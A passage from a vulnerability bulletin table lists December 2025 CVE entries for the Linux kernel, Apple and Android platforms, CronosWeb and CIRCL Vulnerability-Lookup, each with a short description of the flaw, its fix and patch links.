https://git.kernel.org/stable/c/ee0aace5f844ef59335148875d05bec8764e71e8 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ASoC: Intel: avs: Do not share the name pointer between components By sharing 'name' directly, tearing down components may lead to use-after-free errors. Duplicate the name to avoid that. At the same time, update the order of operations - since commit cee28113db17 ("ASoC: dmaengine_pcm: Allow passing component name via config") the framework does not override component->name if set before invoking the initializer. | 2025-12-09 | not yet calculated | CVE-2025-40338 | https://git.kernel.org/stable/c/128bf29c992988f8b4f3829227339908fde5ec86 https://git.kernel.org/stable/c/4dee5c1cc439b0d5ef87f741518268ad6a95b23d |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/amdgpu: fix nullptr err of vm_handle_moved If a amdgpu_bo_va is fpriv->prt_va, the bo of this one is always NULL. So, such kind of amdgpu_bo_va should be updated separately before amdgpu_vm_handle_moved. | 2025-12-09 | not yet calculated | CVE-2025-40339 | https://git.kernel.org/stable/c/47281febebe337586569aa4c5694a7511063a42e https://git.kernel.org/stable/c/273d1ea12e42e9babb9783837906f3c466f213d3 https://git.kernel.org/stable/c/859958a7faefe5b7742b7b8cdbc170713d4bf158 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/xe: Fix oops in xe_gem_fault when running core_hotunplug test. I saw an oops in xe_gem_fault when running the xe-fast-feedback testlist against the realtime kernel without debug options enabled. The panic happens after core_hotunplug unbind-rebind finishes. Presumably what happens is that a process mmaps, unlocks because of the FAULT_FLAG_RETRY_NOWAIT logic, has no process memory left, causing ttm_bo_vm_dummy_page() to return VM_FAULT_NOPAGE, since there was nothing left to populate, and then oopses in "mem_type_is_vram(tbo->resource->mem_type)" because tbo->resource is NULL. It's convoluted, but fits the data and explains the oops after the test exits. | 2025-12-09 | not yet calculated | CVE-2025-40340 | https://git.kernel.org/stable/c/99428bd6123d5676209dfb1d7a8f176cc830b665 https://git.kernel.org/stable/c/29a3064f9c5a908aaf0b39cd6ed30374db11840d https://git.kernel.org/stable/c/1cda3c755bb7770be07d75949bb0f45fb88651f6 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: futex: Don't leak robust_list pointer on exec race sys_get_robust_list() and compat_get_robust_list() use ptrace_may_access() to check if the calling task is allowed to access another task's robust_list pointer. This check is racy against a concurrent exec() in the target process. During exec(), a task may transition from a non-privileged binary to a privileged one (e.g., setuid binary) and its credentials/memory mappings may change. If get_robust_list() performs ptrace_may_access() before this transition, it may erroneously allow access to sensitive information after the target becomes privileged. A racy access allows an attacker to exploit a window during which ptrace_may_access() passes before a target process transitions to a privileged state via exec(). For example, consider a non-privileged task T that is about to execute a setuid-root binary. An attacker task A calls get_robust_list(T) while T is still unprivileged. Since ptrace_may_access() checks permissions based on current credentials, it succeeds. However, if T begins exec immediately afterwards, it becomes privileged and may change its memory mappings. Because get_robust_list() proceeds to access T->robust_list without synchronizing with exec() it may read user-space pointers from a now-privileged process. This violates the intended post-exec access restrictions and could expose sensitive memory addresses or be used as a primitive in a larger exploit chain. Consequently, the race can lead to unauthorized disclosure of information across privilege boundaries and poses a potential security risk. Take a read lock on signal->exec_update_lock prior to invoking ptrace_may_access() and accessing the robust_list/compat_robust_list. This ensures that the target task's exec state remains stable during the check, allowing for consistent and synchronized validation of credentials. | 2025-12-09 | not yet calculated | CVE-2025-40341 | https://git.kernel.org/stable/c/6511984d1aa1360181bcafb1ca75df7f291ef237 https://git.kernel.org/stable/c/4aced32596ead1820b7dbd8e40d30b30dc1f3ad4 https://git.kernel.org/stable/c/3b4222494489f6d4b8705a496dab03384b7ca998 https://git.kernel.org/stable/c/b524455a51feb6013df3a5dba3160487b2e8e22a https://git.kernel.org/stable/c/6b54082c3ed4dc9821cdf0edb17302355cc5bb45 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: nvme-fc: use lock accessing port_state and rport state nvme_fc_unregister_remote removes the remote port on a lport object at any point in time when there is no active association. This races with with the reconnect logic, because nvme_fc_create_association is not taking a lock to check the port_state and atomically increase the active count on the rport. | 2025-12-09 | not yet calculated | CVE-2025-40342 | https://git.kernel.org/stable/c/de3d91af47bc015031e7721b100a29989f6498a5 https://git.kernel.org/stable/c/e8cde03de8674b05f2c5e0870729049eba517800 https://git.kernel.org/stable/c/4253e0a4546138a2bf9cb6acf66b32fee677fc7c https://git.kernel.org/stable/c/25f4bf1f7979a7871974fd36c79d69ff1cf4b446 https://git.kernel.org/stable/c/9950af4303942081dc8c7a5fdc3688c17c7eb6c0 https://git.kernel.org/stable/c/a2f7fa75c4a2a07328fa22ccbef461db76790b55 https://git.kernel.org/stable/c/891cdbb162ccdb079cd5228ae43bdeebce8597ad |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: nvmet-fc: avoid scheduling association deletion twice When forcefully shutting down a port via the configfs interface, nvmet_port_subsys_drop_link() first calls nvmet_port_del_ctrls() and then nvmet_disable_port(). Both functions will eventually schedule all remaining associations for deletion. The current implementation checks whether an association is about to be removed, but only after the work item has already been scheduled. As a result, it is possible for the first scheduled work item to free all resources, and then for the same work item to be scheduled again for deletion. Because the association list is an RCU list, it is not possible to take a lock and remove the list entry directly, so it cannot be looked up again. Instead, a flag (terminating) must be used to determine whether the association is already in the process of being deleted. | 2025-12-09 | not yet calculated | CVE-2025-40343 | https://git.kernel.org/stable/c/2f4852db87e25d4e226b25cb6f652fef9504360e https://git.kernel.org/stable/c/85e2ce1920cb511d57aae59f0df6ff85b28bf04d https://git.kernel.org/stable/c/601ed47b2363c24d948d7bac0c23abc8bd459570 https://git.kernel.org/stable/c/04d17540ef51e2c291eb863ca87fd332259b2d40 https://git.kernel.org/stable/c/c09ac9a63fc3aaf4670ad7b5e4f5afd764424154 https://git.kernel.org/stable/c/f2537be4f8421f6495edfa0bc284d722f253841d |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ASoC: Intel: avs: Disable periods-elapsed work when closing PCM avs_dai_fe_shutdown() handles the shutdown procedure for HOST HDAudio stream while period-elapsed work services its IRQs. As the former frees the DAI's private context, these two operations shall be synchronized to avoid slab-use-after-free or worse errors. | 2025-12-09 | not yet calculated | CVE-2025-40344 | https://git.kernel.org/stable/c/ca6d2b7aca778afbf8c0c4b330d10cb228c14052 https://git.kernel.org/stable/c/b41fca4aa60be896ba8a81b57aac5dcc6eee66c0 https://git.kernel.org/stable/c/845f716dc5f354c719f6fda35048b6c2eca99331 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: usb: storage: sddr55: Reject out-of-bound new_pba Discovered by Atuin - Automated Vulnerability Discovery Engine. new_pba comes from the status packet returned after each write. A bogus device could report values beyond the block count derived from info->capacity, letting the driver walk off the end of pba_to_lba[] and corrupt heap memory. Reject PBAs that exceed the computed block count and fail the transfer so we avoid touching out-of-range mapping entries. | 2025-12-12 | not yet calculated | CVE-2025-40345 | https://git.kernel.org/stable/c/d00a6c04a502cd52425dbf35588732c652b16490 https://git.kernel.org/stable/c/26e9b5da3231da7dc357b363883b5b7b51a64092 https://git.kernel.org/stable/c/aa64e0e17e3a5991a25e6a46007770c629039869 https://git.kernel.org/stable/c/04a8a6393f3f2f471e05eacca33282dd30b01432 https://git.kernel.org/stable/c/a20f1dd19d21dcb70140ea5a71b1f8cbe0c7e68f https://git.kernel.org/stable/c/5ebe8d479aaf4f41ac35e6955332304193c646f6 https://git.kernel.org/stable/c/b59d4fda7e7d0aff1043a7f742487cb829f5aac1 |
| CronosWeb i2A--CronosWeb | Direct Object Reference Vulnerability (IDOR) in i2A's CronosWeb, in versions prior to 25.00.00.12, inclusive. This vulnerability could allow an authenticated attacker to access other users' documents by manipulating the 'documentCode' parameter in '/CronosWeb/Modulos/Personas/DocumentosPersonales/AdjuntarDocumentosPersonas'. | 2025-12-10 | not yet calculated | CVE-2025-41358 | https://www.incibe.es/en/incibe-cert/notices/aviso/direct-reference-insecure-objects-idor-cronosweb-cronosweb-i2a |
| CIRCL--Vulnerability-Lookup | In affected versions, vulnerability-lookup did not track or limit failed One-Time Password (OTP) attempts during Two-Factor Authentication (2FA) verification. An attacker who already knew or guessed a valid username and password could submit an arbitrary number of OTP codes without causing the account to be locked or generating any specific alert for administrators. This lack of rate-limiting and lockout on OTP failures significantly lowers the cost of online brute-force attacks against 2FA codes and increases the risk of successful account takeover, especially if OTP entropy is reduced (e.g. short numeric codes, user reuse, or predictable tokens). Additionally, administrators had no direct visibility into accounts experiencing repeated 2FA failures, making targeted attacks harder to detect and investigate. The patch introduces a persistent failed_otp_attempts counter on user accounts, locks the user after 5 invalid OTP submissions, resets the counter on successful verification, and surfaces failed 2FA attempts in the admin user list. This enforces an account lockout policy for OTP brute-force attempts and improves monitoring capabilities for suspicious 2FA activity. This issue affects Vulnerability-Lookup: before 2.18.0. | 2025-12-08 | not yet calculated | CVE-2025-42615 | https://vulnerability.circl.lu/vuln/gcve-1-2025-0033 |
| CIRCL--Vulnerability-Lookup | Some endpoints in vulnerability-lookup that modified application state (e.g. changing database entries, user data, configurations, or other privileged actions) may have been accessible via HTTP GET requests without requiring a CSRF token. This flaw leaves the application vulnerable to Cross-Site Request Forgery (CSRF) attacks: an attacker who tricks a logged-in user into visiting a malicious website could cause the user's browser to issue GET requests that perform unintended state-changing operations in the context of their authenticated session. Because the server would treat these GET requests as valid (since no CSRF protection or POST method enforcement was in place), the attacker could exploit this to escalate privileges, change settings, or carry out other unauthorized actions without needing the user's explicit consent or awareness. The fix ensures that all state-changing endpoints now require HTTP POST requests and include a valid CSRF token. This enforces that state changes cannot be triggered by arbitrary cross-site GET requests. This issue affects Vulnerability-Lookup: before 2.18.0. | 2025-12-08 | not yet calculated | CVE-2025-42616 | https://vulnerability.circl.lu/vuln/gcve-1-2025-0034 |
| CIRCL--Vulnerability-Lookup | In affected versions, vulnerability-lookup handled user-controlled content in comments and bundles in an unsafe way, which could lead to stored Cross-Site Scripting (XSS). On the backend, the related_vulnerabilities field of bundles accepted arbitrary strings without format validation or proper sanitization. On the frontend, comment and bundle descriptions were converted from Markdown to HTML and then injected directly into the DOM using string templates and innerHTML. This combination allowed an attacker who could create or edit comments or bundles to store crafted HTML/JavaScript payloads which would later be rendered and executed in the browser of any user visiting the affected profile page (user.html). This issue affects Vulnerability-Lookup: before 2.18.0. | 2025-12-08 | not yet calculated | CVE-2025-42620 | https://vulnerability.circl.lu/vuln/gcve-1-2025-0035 |
| Apple--macOS | The issue was addressed by adding additional logic. This issue is fixed in macOS Sequoia 15.7.3. An app may be able to bypass launch constraint protections and execute malicious code with elevated privileges. | 2025-12-12 | not yet calculated | CVE-2025-43320 | https://support.apple.com/en-us/125887 |
| Apple--macOS | A permissions issue was addressed with additional restrictions. This issue is fixed in macOS Tahoe 26.1. An app may be able to access protected user data. | 2025-12-12 | not yet calculated | CVE-2025-43351 | https://support.apple.com/en-us/125634 |
| Apple--macOS | This issue was addressed with improved handling of symlinks. This issue is fixed in macOS Tahoe 26.1. A malicious app may be able to delete protected user data. | 2025-12-12 | not yet calculated | CVE-2025-43381 | https://support.apple.com/en-us/125634 |
| Apple--macOS | An injection issue was addressed with improved validation. This issue is fixed in macOS Tahoe 26.1. An app may be able to access sensitive user data. | 2025-12-12 | not yet calculated | CVE-2025-43388 | https://support.apple.com/en-us/125634 |
| Apple--macOS | A permissions issue was addressed with additional sandbox restrictions. This issue is fixed in macOS Tahoe 26.1. An app may be able to break out of its sandbox. | 2025-12-12 | not yet calculated | CVE-2025-43393 | https://support.apple.com/en-us/125634 |
| Apple--macOS | The issue was addressed with improved memory handling. This issue is fixed in macOS Tahoe 26.1. An app may be able to cause unexpected system termination or corrupt process memory. | 2025-12-12 | not yet calculated | CVE-2025-43402 | https://support.apple.com/en-us/125634 |
| Apple--macOS | A permissions issue was addressed with additional sandbox restrictions. This issue is fixed in macOS Tahoe 26.1. An app may be able to access sensitive user data. | 2025-12-12 | not yet calculated | CVE-2025-43404 | https://support.apple.com/en-us/125634 |
| Apple--macOS | A logic issue was addressed with improved restrictions. This issue is fixed in macOS Tahoe 26.1. An app may be able to access sensitive user data. | 2025-12-12 | not yet calculated | CVE-2025-43406 | https://support.apple.com/en-us/125634 |
| Apple--macOS | The issue was addressed with improved handling of caches. This issue is fixed in macOS Sequoia 15.7.2, macOS Sonoma 14.8.2. An attacker with physical access may be able to view deleted notes. | 2025-12-12 | not yet calculated | CVE-2025-43410 | https://support.apple.com/en-us/125636 https://support.apple.com/en-us/125635 |
| Apple--macOS | A logic issue was addressed with improved restrictions. This issue is fixed in macOS Sonoma 14.8.3, macOS Sequoia 15.7.3. An app may be able to access protected user data. | 2025-12-12 | not yet calculated | CVE-2025-43416 | https://support.apple.com/en-us/125888 https://support.apple.com/en-us/125887 |
| Apple--iOS and iPadOS | An information disclosure issue was addressed with improved privacy controls. This issue is fixed in iOS 26.1 and iPadOS 26.1. An app may be able to fingerprint the user. | 2025-12-12 | not yet calculated | CVE-2025-43437 | https://support.apple.com/en-us/125632 |
| Apple--macOS | This issue was addressed with improved validation of symlinks. This issue is fixed in macOS Tahoe 26.1. An app may be able to access protected user data. | 2025-12-12 | not yet calculated | CVE-2025-43461 | https://support.apple.com/en-us/125634 |
| Apple--macOS | A parsing issue in the handling of directory paths was addressed with improved path validation. This issue is fixed in macOS Sonoma 14.8.3, macOS Tahoe 26.1, macOS Sequoia 15.7.3. An app may be able to access sensitive user data. | 2025-12-12 | not yet calculated | CVE-2025-43463 | https://support.apple.com/en-us/125888 https://support.apple.com/en-us/125634 https://support.apple.com/en-us/125887 |
| Apple--macOS | A denial-of-service issue was addressed with improved input validation. This issue is fixed in macOS Tahoe 26.1. Visiting a website may lead to an app denial-of-service. | 2025-12-12 | not yet calculated | CVE-2025-43464 | https://support.apple.com/en-us/125634 |
| Apple--macOS | A parsing issue in the handling of directory paths was addressed with improved path validation. This issue is fixed in macOS Tahoe 26.1. An app may be able to access sensitive user data. | 2025-12-12 | not yet calculated | CVE-2025-43465 | https://support.apple.com/en-us/125634 |
| Apple--macOS | An injection issue was addressed with improved validation. This issue is fixed in macOS Tahoe 26.1. An app may be able to access sensitive user data. | 2025-12-12 | not yet calculated | CVE-2025-43466 | https://support.apple.com/en-us/125634 |
| Apple--macOS | This issue was addressed with improved checks. This issue is fixed in macOS Tahoe 26.1. An app may be able to gain root privileges. | 2025-12-12 | not yet calculated | CVE-2025-43467 | https://support.apple.com/en-us/125634 |
| Apple--macOS | A permissions issue was addressed with additional restrictions. This issue is fixed in macOS Tahoe 26.1. A standard user may be able to view files made from a disk image belonging to an administrator. | 2025-12-12 | not yet calculated | CVE-2025-43470 | https://support.apple.com/en-us/125634 |
| Apple--macOS | The issue was addressed with improved checks. This issue is fixed in macOS Tahoe 26.1. An app may be able to access sensitive user data. | 2025-12-12 | not yet calculated | CVE-2025-43471 | https://support.apple.com/en-us/125634 |
| Apple--macOS | This issue was addressed with improved state management. This issue is fixed in macOS Tahoe 26.1. An app may be able to access sensitive user data. | 2025-12-12 | not yet calculated | CVE-2025-43473 | https://support.apple.com/en-us/125634 |
| Apple--macOS | The issue was addressed with improved input validation. This issue is fixed in macOS Sonoma 14.8.3, macOS Sequoia 15.7.3. An app may be able to cause a denial-of-service. | 2025-12-12 | not yet calculated | CVE-2025-43482 | https://support.apple.com/en-us/125888 https://support.apple.com/en-us/125887 |
| Apple--macOS | A mail header parsing issue was addressed with improved checks. This issue is fixed in watchOS 26.1, iOS 18.7.2 and iPadOS 18.7.2, macOS Tahoe 26.1, visionOS 26.1, macOS Sonoma 14.8.2, macOS Sequoia 15.7.2, iOS 26.1 and iPadOS 26.1. An attacker may be able to cause a persistent denial-of-service. | 2025-12-12 | not yet calculated | CVE-2025-43494 | https://support.apple.com/en-us/125636 https://support.apple.com/en-us/125634 https://support.apple.com/en-us/125638 https://support.apple.com/en-us/125639 https://support.apple.com/en-us/125635 https://support.apple.com/en-us/125632 https://support.apple.com/en-us/125633 |
| Apple--macOS | An access issue was addressed with additional sandbox restrictions. This issue is fixed in macOS Tahoe 26.1. An app may be able to break out of its sandbox. | 2025-12-12 | not yet calculated | CVE-2025-43497 | https://support.apple.com/en-us/125634 |
| Apple--macOS | A logic error was addressed with improved error handling. This issue is fixed in macOS Tahoe 26.1. iCloud Private Relay may not activate when more than one user is logged in at the same time. | 2025-12-12 | not yet calculated | CVE-2025-43506 | https://support.apple.com/en-us/125634 |
| Apple--macOS | This issue was addressed with improved data protection. This issue is fixed in macOS Sonoma 14.8.3, macOS Sequoia 15.7.3. An app may be able to access sensitive user data. | 2025-12-12 | not yet calculated | CVE-2025-43509 | https://support.apple.com/en-us/125888 https://support.apple.com/en-us/125887 |
| Apple--macOS | A memory corruption issue was addressed with improved lock state checking. This issue is fixed in watchOS 26.1, iOS 18.7.2 and iPadOS 18.7.2, macOS Tahoe 26.1, visionOS 26.1, tvOS 26.1, macOS Sonoma 14.8.2, macOS Sequoia 15.7.2, iOS 26.1 and iPadOS 26.1. A malicious application may cause unexpected changes in memory shared between processes. | 2025-12-12 | not yet calculated | CVE-2025-43510 | https://support.apple.com/en-us/125636 https://support.apple.com/en-us/125637 https://support.apple.com/en-us/125634 https://support.apple.com/en-us/125638 https://support.apple.com/en-us/125639 https://support.apple.com/en-us/125635 https://support.apple.com/en-us/125632 https://support.apple.com/en-us/125633 |
| Apple--iOS and iPadOS | A use-after-free issue was addressed with improved memory management. This issue is fixed in iOS 18.7.2 and iPadOS 18.7.2. Processing maliciously crafted web content may lead to an unexpected process crash. | 2025-12-12 | not yet calculated | CVE-2025-43511 | https://support.apple.com/en-us/125633 |
| Apple--macOS | A logic issue was addressed with improved checks. This issue is fixed in macOS Sonoma 14.8.3, macOS Sequoia 15.7.3. An app may be able to elevate privileges. | 2025-12-12 | not yet calculated | CVE-2025-43512 | https://support.apple.com/en-us/125888 https://support.apple.com/en-us/125887 |
| Apple--macOS | A permissions issue was addressed by removing the vulnerable code. This issue is fixed in macOS Sonoma 14.8.3, macOS Sequoia 15.7.3. An app may be able to read sensitive location information. | 2025-12-12 | not yet calculated | CVE-2025-43513 | https://support.apple.com/en-us/125888 https://support.apple.com/en-us/125887 |
| Apple--macOS | A session management issue was addressed with improved checks. This issue is fixed in macOS Sonoma 14.8.3, macOS Sequoia 15.7.3. A user with Voice Control enabled may be able to transcribe another user's activity. | 2025-12-12 | not yet calculated | CVE-2025-43516 | https://support.apple.com/en-us/125888 https://support.apple.com/en-us/125887 |
| Apple--macOS | A privacy issue was addressed with improved private data redaction for log entries. This issue is fixed in macOS Sonoma 14.8.3, macOS Sequoia 15.7.3. An app may be able to access protected user data. | 2025-12-12 | not yet calculated | CVE-2025-43517 | https://support.apple.com/en-us/125888 https://support.apple.com/en-us/125887 |
| Apple--macOS | A logic issue was addressed with improved checks. This issue is fixed in macOS Sonoma 14.8.3, macOS Sequoia 15.7.3. An app may be able to inappropriately access files through the spellcheck API. | 2025-12-12 | not yet calculated | CVE-2025-43518 | https://support.apple.com/en-us/125888 https://support.apple.com/en-us/125887 |
| Apple--macOS | A permissions issue was addressed with additional restrictions. This issue is fixed in macOS Sonoma 14.8.3, macOS Sequoia 15.7.3. An app may be able to access sensitive user data. | 2025-12-12 | not yet calculated | CVE-2025-43519 | https://support.apple.com/en-us/125888 https://support.apple.com/en-us/125887 |
| Apple--macOS | A memory corruption issue was addressed with improved memory handling. This issue is fixed in watchOS 26.1, iOS 18.7.2 and iPadOS 18.7.2, macOS Tahoe 26.1, visionOS 26.1, tvOS 26.1, macOS Sonoma 14.8.2, macOS Sequoia 15.7.2, iOS 26.1 and iPadOS 26.1. A malicious application may be able to cause unexpected system termination or write kernel memory. | 2025-12-12 | not yet calculated | CVE-2025-43520 | https://support.apple.com/en-us/125636 https://support.apple.com/en-us/125637 https://support.apple.com/en-us/125634 https://support.apple.com/en-us/125638 https://support.apple.com/en-us/125639 https://support.apple.com/en-us/125635 https://support.apple.com/en-us/125632 https://support.apple.com/en-us/125633 |
| Apple--macOS | A downgrade issue affecting Intel-based Mac computers was addressed with additional code-signing restrictions. This issue is fixed in macOS Sequoia 15.7.3. An app may be able to access sensitive user data. | 2025-12-12 | not yet calculated | CVE-2025-43521 | https://support.apple.com/en-us/125887 |
| Apple--macOS | A downgrade issue affecting Intel-based Mac computers was addressed with additional code-signing restrictions. This issue is fixed in macOS Sequoia 15.7.3. An app may be able to access user-sensitive data. | 2025-12-12 | not yet calculated | CVE-2025-43522 | https://support.apple.com/en-us/125887 |
| Apple--macOS | A permissions issue was addressed with additional restrictions. This issue is fixed in macOS Sequoia 15.7.3. An app may be able to access sensitive user data. | 2025-12-12 | not yet calculated | CVE-2025-43523 | https://support.apple.com/en-us/125887 |
| Apple--macOS | A permissions issue was addressed with additional restrictions. This issue is fixed in macOS Sequoia 15.7.3. An app may be able to gain root privileges. | 2025-12-12 | not yet calculated | CVE-2025-43527 | https://support.apple.com/en-us/125887 |
| Apple--macOS | This issue was addressed with improved checks. This issue is fixed in macOS Sonoma 14.8.3, macOS Sequoia 15.7.3. An app may be able to access sensitive user data. | 2025-12-12 | not yet calculated | CVE-2025-43530 | https://support.apple.com/en-us/125888 https://support.apple.com/en-us/125887 |
| Apple--macOS | A memory corruption issue was addressed with improved bounds checking. This issue is fixed in macOS Sonoma 14.8.3, macOS Sequoia 15.7.3. Processing malicious data may lead to unexpected app termination. | 2025-12-12 | not yet calculated | CVE-2025-43532 | https://support.apple.com/en-us/125888 https://support.apple.com/en-us/125887 |
| Apple--macOS | A logging issue was addressed with improved data redaction. This issue is fixed in macOS Sonoma 14.8.3. An app may be able to access sensitive user data. | 2025-12-12 | not yet calculated | CVE-2025-43538 | https://support.apple.com/en-us/125888 |
| Apple--macOS | The issue was addressed with improved bounds checks. This issue is fixed in macOS Sonoma 14.8.3, macOS Sequoia 15.7.3. Processing a file may lead to memory corruption. | 2025-12-12 | not yet calculated | CVE-2025-43539 | https://support.apple.com/en-us/125888 https://support.apple.com/en-us/125887 |
| Apple--macOS | This issue was addressed with improved state management. This issue is fixed in macOS Sequoia 15.7.3. Password fields may be unintentionally revealed when remotely controlling a device over FaceTime. | 2025-12-12 | not yet calculated | CVE-2025-43542 | https://support.apple.com/en-us/125887 |
| Apple--macOS | An information disclosure issue was addressed with improved privacy controls. This issue is fixed in macOS Sonoma 14.8.3, macOS Sequoia 15.7.3. An app may be able to access sensitive user data. | 2025-12-12 | not yet calculated | CVE-2025-46276 | https://support.apple.com/en-us/125888 https://support.apple.com/en-us/125887 |
| Apple--macOS | An integer overflow was addressed by adopting 64-bit timestamps. This issue is fixed in macOS Sonoma 14.8.3, macOS Sequoia 15.7.3. An app may be able to gain root privileges. | 2025-12-12 | not yet calculated | CVE-2025-46285 | https://support.apple.com/en-us/125888 https://support.apple.com/en-us/125887 |
| Apple--macOS | An inconsistent user interface issue was addressed with improved state management. This issue is fixed in macOS Sonoma 14.8.3, macOS Sequoia 15.7.3. An attacker may be able to spoof their FaceTime caller ID. | 2025-12-12 | not yet calculated | CVE-2025-46287 | https://support.apple.com/en-us/125888 https://support.apple.com/en-us/125887 |
| Apple--macOS | A logic issue was addressed with improved file handling. This issue is fixed in macOS Sonoma 14.8.3, macOS Sequoia 15.7.3. An app may be able to access protected user data. | 2025-12-12 | not yet calculated | CVE-2025-46289 | https://support.apple.com/en-us/125888 https://support.apple.com/en-us/125887 |
| Google--Android | In disassociate of DisassociationProcessor.java, there is a possible way for an app to continue reading notifications when not associated to a companion device due to improper input validation. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. | 2025-12-08 | not yet calculated | CVE-2025-48525 | https://android.googlesource.com/platform/frameworks/base/+/31989869759e9b6119dc1cf324c395d789024908 https://android.googlesource.com/platform/frameworks/base/+/5ec1cdae1805dec292a2de5554896363eaa078eb https://source.android.com/security/bulletin/2025-12-01 |
| Google--Android | In grantAllowlistedPackagePermissions of SettingsSliceProvider.java, there is a possible way for a third party app to modify secure settings due to a confused deputy. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. | 2025-12-08 | not yet calculated | CVE-2025-48536 | https://android.googlesource.com/platform/packages/apps/Settings/+/586f8dedd8e0e8a7ca5577cd1f06891f7e84e1e1 https://source.android.com/security/bulletin/2025-12-01 |
| Google--Android | In multiple functions of NotificationStation.java, there is a possible cross-profile information disclosure due to a confused deputy. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. | 2025-12-08 | not yet calculated | CVE-2025-48555 | https://android.googlesource.com/platform/packages/apps/Settings/+/596c7b9911f2004df83b8d2708ad4b50e8d53805 https://source.android.com/security/bulletin/2025-12-01 |
| Google--Android | In multiple locations, there is a possible intent filter bypass due to a race condition. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. | 2025-12-08 | not yet calculated | CVE-2025-48564 | https://android.googlesource.com/platform/frameworks/base/+/28579dff4305f764302d85f95509671eafbf62ac https://android.googlesource.com/platform/packages/modules/IntentResolver/+/4e6cf5285d0b1725fb9141e810050cfdb3fb42fd https://android.googlesource.com/platform/frameworks/base/+/0f3e248787d88154c8592f6e055b6b3586f4877d https://source.android.com/security/bulletin/2025-12-01 |
| Google--Android | In multiple locations, there is a possible way to bypass the cross profile intent filter due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. | 2025-12-08 | not yet calculated | CVE-2025-48565 | https://android.googlesource.com/platform/frameworks/base/+/28579dff4305f764302d85f95509671eafbf62ac https://android.googlesource.com/platform/packages/modules/IntentResolver/+/4e6cf5285d0b1725fb9141e810050cfdb3fb42fd https://android.googlesource.com/platform/frameworks/base/+/0f3e248787d88154c8592f6e055b6b3586f4877d https://source.android.com/security/bulletin/2025-12-01 |
| Google--Android | In multiple locations, there is a possible bypass of user profile boundary with a forwarded intent due to improper input validation. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. | 2025-12-08 | not yet calculated | CVE-2025-48566 | https://android.googlesource.com/platform/frameworks/base/+/28579dff4305f764302d85f95509671eafbf62ac https://android.googlesource.com/platform/frameworks/base/+/0f3e248787d88154c8592f6e055b6b3586f4877d https://android.googlesource.com/platform/packages/modules/IntentResolver/+/4e6cf5285d0b1725fb9141e810050cfdb3fb42fd https://source.android.com/security/bulletin/2025-12-01 |
| Google--Android | In multiple locations, there is a possible permanent denial of service due to resource exhaustion. This could lead to local denial of service with no additional execution privileges needed. User interaction is not needed for exploitation. | 2025-12-08 | not yet calculated | CVE-2025-48569 | https://source.android.com/security/bulletin/android-16-qpr2 |
| Google--Android | In multiple locations, there is a possible way to launch activities from the background due to a permissions bypass. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. | 2025-12-08 | not yet calculated | CVE-2025-48572 | https://android.googlesource.com/platform/frameworks/base/+/e707f6600330691f9c67dc023c09f4cd2fc59192 https://source.android.com/security/bulletin/2025-12-01 |
| Google--Android | In sendCommand of MediaSessionRecord.java, there is a possible way to launch the foreground service while the app is in the background due to FGS while-in-use abuse. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. | 2025-12-08 | not yet calculated | CVE-2025-48573 | https://android.googlesource.com/platform/frameworks/base/+/039030a6b0e7d255af70609a3607e805ad2a99ff https://source.android.com/security/bulletin/2025-12-01 |
| Google--Android | In multiple functions of CertInstaller.java, there is a possible way to install certificates due to a permissions bypass. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. | 2025-12-08 | not yet calculated | CVE-2025-48575 | https://android.googlesource.com/platform/packages/apps/CertInstaller/+/d688ebdbfd404df1e25654bfdf9e790ad9f0db3c https://source.android.com/security/bulletin/2025-12-01 |
| Google--Android | In updateNotificationChannelGroupFromPrivilegedListener of NotificationManagerService.java, there is a possible permanent denial of service due to resource exhaustion. This could lead to local denial of service with no additional execution privileges needed. User interaction is not needed for exploitation. | 2025-12-08 | not yet calculated | CVE-2025-48576 | https://android.googlesource.com/platform/frameworks/base/+/b812baa1463c9f9e81efa617c9d08ed7a63488b4 https://source.android.com/security/bulletin/2025-12-01 |
| Google--Android | In connectInternal of MediaBrowser.java, there is a possible way to access while in use permission while the app is in background due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. | 2025-12-08 | not yet calculated | CVE-2025-48580 | https://android.googlesource.com/platform/frameworks/base/+/eb19b27ed8abe9070df9fb85bc9693c8d4ba321b https://source.android.com/security/bulletin/2025-12-01 |
| Google--Android | In multiple functions of BaseBundle.java, there is a possible way to execute arbitrary code due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. | 2025-12-08 | not yet calculated | CVE-2025-48583 | https://android.googlesource.com/platform/frameworks/base/+/02751bc65824a3877bdc21d865cd801b5e9f5e6c https://source.android.com/security/bulletin/2025-12-01 |
| Google--Android | In multiple functions of NotificationManagerService.java, there is a possible way to bypass the per-package channel limits causing resource exhaustion. This could lead to local denial of service with no additional execution privileges needed. User interaction is not needed for exploitation. | 2025-12-08 | not yet calculated | CVE-2025-48584 | https://android.googlesource.com/platform/frameworks/base/+/08a0766708db2071d9b8b65abf40d7e8057daaa1 https://source.android.com/security/bulletin/2025-12-01 |
| Google--Android | In onActivityResult of EditFdnContactScreen.java, there is a possible way to leak contacts from the work profile due to a confused deputy. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. | 2025-12-08 | not yet calculated | CVE-2025-48586 | https://android.googlesource.com/platform/packages/services/Telephony/+/851fc787e96189a37f88cb9eaa688087883357c3 https://source.android.com/security/bulletin/2025-12-01 |
